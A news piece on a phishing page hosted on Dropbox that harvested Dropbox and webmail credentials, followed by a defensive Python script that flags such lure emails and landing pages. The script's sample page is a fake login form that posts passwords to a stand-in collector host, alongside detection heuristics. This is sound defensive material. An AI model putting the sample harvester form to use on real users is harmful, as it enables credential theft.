Why Dropbox dropped the ball during phishing scam…

“Talk about a meta sort of attack,” says Casper Manes, consultant, GFI Software, reacting to a phishing attack which used “Dropbox to spoof Dropbox.”

Manes’ comments follow news that the storage company recently detected and shut down a spoofing page, hosted on Dropbox itself, that was designed to harvest users’ credentials for Dropbox and for several popular webmail services.

By hosting the fake login page within the Dropbox service itself, the attacker or attackers had several factors working in their favour to convince victims that they were visiting a legitimate page rather than falling for a hoax.

In Manes’ own words, here’s how it worked:

“The attackers created a well-designed web page, hosted on Dropbox itself in a user account set up for the purpose, and that looks like a legitimate Dropbox login page,” he says.

“They then sent emails to victims, informing them that someone tried to send them a large file, and advising them to click a link in the email to access the data.

“Of course, no one should click a link in an email they are not expecting, but we all know that users continue to do so.

“Since the URL was within a Dropbox domain, even clever users who copy and paste, or manually type in a URL, might see this as legitimate.

Manes says the hoax page was served over HTTPS, since it was hosted in a user’s Dropbox, so many users would see only the padlock icon in the address bar and assume they were safe.

Because some elements of the page were loaded over plain HTTP, he says, some browsers might warn users that not all content on the page is secure, but such mixed-content warnings are too common a failing of legitimate sites to be relied on to stop users from doing the wrong thing.

“The form prompted users for their credentials, using either their Dropbox account or one of the popular webmail providers,” he explains.

“After harvesting credentials, the page simply redirected users to Dropbox’s own login page, much like you might see when a webpage malfunctions.”

Dropbox quickly detected and disabled access to the hoax page, and should be commended for its detection, rapid response and disclosure of the event, according to Manes.

“But all of that is reactionary,” he adds, “and some users may have become victims.

“As organisations that rely on Internet services, we need to be more proactive in how we defend users from these sorts of attacks.”

Manes believes that, to succeed, phishing messages have to reach victims’ mailboxes in the first place.

“Proper mail filtering solutions can and should be used to detect and block phishing attacks like this,” he claims. “They can be used to not only filter out spam and malware, but also to detect and block phishing messages before they even get to your users.

“If there is no phishing message in their inbox, there is nothing for them to click on.”

Layer defences…

But according to Manes, the best defences are layered ones; “should a phishing message get through to your users, you don’t want their own best judgment to be the only other protection,” he adds.

“Good web monitoring solutions offer active scanning of all downloads and block access to known harmful websites, like those that host malware, or are known phishing domains.

“By protecting users from compromised and malicious websites, you can protect them whether an email with a link gets through, they manually type in a URL, or they try to visit a legitimate site that fell victim to a compromise and is now serving malware.”

While this clever attack was quickly shut down by Dropbox, Manes believes it won’t be the last time “some clever attacker” uses a system to take advantage of victims.

“Blocking all access to all external solutions is no solution at all,” he claims, “as many of these, Dropbox included, offer fantastic capabilities to users and businesses alike, but you have to provide access in a safe and secure manner.

“Combining mail filtering with web monitoring gives you the one-two punch you need to knock out the opposition before they make victims of your users.”
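The two layers Manes describes, a mail filter that inspects links before the message reaches the inbox and a web monitor that inspects the page a link resolves to, can be illustrated with a small set of heuristics. The Python below is an added example for this article; it is not code from GFI Software, Dropbox or the attack itself. The file-sharing host list, the shared-link path pattern and the lure phrases are assumptions for the demo, and the sample email and landing-page HTML are constructed (the share link is not a real one). It shows why a domain allowlist alone is not enough: the link host is the legitimate brand domain, so the signals have to come from the path (a user-uploaded HTML file), the lure wording, and the page itself (a password field, a form posting off-site, and mixed HTTP/HTTPS content).

```python
"""Heuristics for a phishing page hosted on a trusted file-sharing domain.

Added example, not code from the article, GFI Software or Dropbox.
Host list, path pattern, lure phrases and sample data are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts whose shared links serve user-uploaded content.
FILE_SHARING_HOSTS = {"www.dropbox.com", "dl.dropboxusercontent.com"}
# Assumption: a shared-link path that resolves to a user-uploaded HTML file.
SHARED_HTML_PATH = re.compile(r"^/s/[^/]+/[^/]+\.html?$", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s<>\"')]+")
LURE_PHRASES = ("large file", "tried to send you", "click the link")


def check_email(body: str) -> dict:
    """Mail-filter side: flag links to user-hosted HTML on a sharing service."""
    links = URL_RE.findall(body)
    flagged = []
    for link in links:
        u = urlparse(link)
        if u.hostname in FILE_SHARING_HOSTS and SHARED_HTML_PATH.match(u.path):
            flagged.append(link)
    lower = body.lower()
    lures = [p for p in LURE_PHRASES if p in lower]
    # A user-hosted HTML file behind a "someone sent you a file" lure is
    # enough to quarantine; the lure count is kept for scoring/reporting.
    return {"links": links, "flagged": flagged, "lure_phrases": lures,
            "suspicious": bool(flagged)}


class _PageScanner(HTMLParser):
    """Collect password inputs, form targets and loaded resources."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.form_actions = []
        self.resources = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag != "a":  # anchors are navigation, not loaded resources
            for key in ("src", "href"):
                if a.get(key):
                    self.resources.append(a[key])


def scan_landing_page(page_url: str, html: str) -> dict:
    """Web-monitoring side: inspect the page the link resolves to."""
    page = urlparse(page_url)
    scanner = _PageScanner()
    scanner.feed(html)
    # Mixed content: HTTPS page pulling sub-resources over plain HTTP.
    mixed = [r for r in scanner.resources
             if page.scheme == "https" and urlparse(r).scheme == "http"]
    # Credentials posted to a host other than the page's own.
    offsite = [f for f in scanner.form_actions
               if urlparse(f).hostname and urlparse(f).hostname != page.hostname]
    harvester = scanner.password_fields > 0 and (
        bool(offsite) or page.hostname in FILE_SHARING_HOSTS)
    return {"password_fields": scanner.password_fields,
            "mixed_content": mixed,
            "offsite_form_actions": offsite,
            "credential_harvester": harvester}


# Constructed sample lure (the share link is fictitious).
SAMPLE_EMAIL = """Subject: Someone sent you a large file
Hi,
A colleague tried to send you a large file via Dropbox. Click the link below to access the data:
https://www.dropbox.com/s/abc123example/Dropbox-Login.html
Regards,
The Dropbox Team
"""

# Constructed sample landing page: HTTPS page, HTTP assets, off-site POST.
SAMPLE_PAGE_URL = "https://www.dropbox.com/s/abc123example/Dropbox-Login.html"
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="http://cdn.example.net/style.css">
</head><body>
<img src="http://cdn.example.net/dropbox-logo.png">
<form action="http://collector.example.net/post.php" method="post">
  <select name="provider"><option>Dropbox</option><option>Gmail</option></select>
  <input name="email"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    print(check_email(SAMPLE_EMAIL))
    print(scan_landing_page(SAMPLE_PAGE_URL, SAMPLE_PAGE))
```

Run stand-alone, the script quarantines the sample message on the link alone and classifies the sample page as a credential harvester on three independent signals; a real filter would feed these into a score rather than act on any one of them, since a legitimate shared HTML file or a site with mixed content is not by itself malicious.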
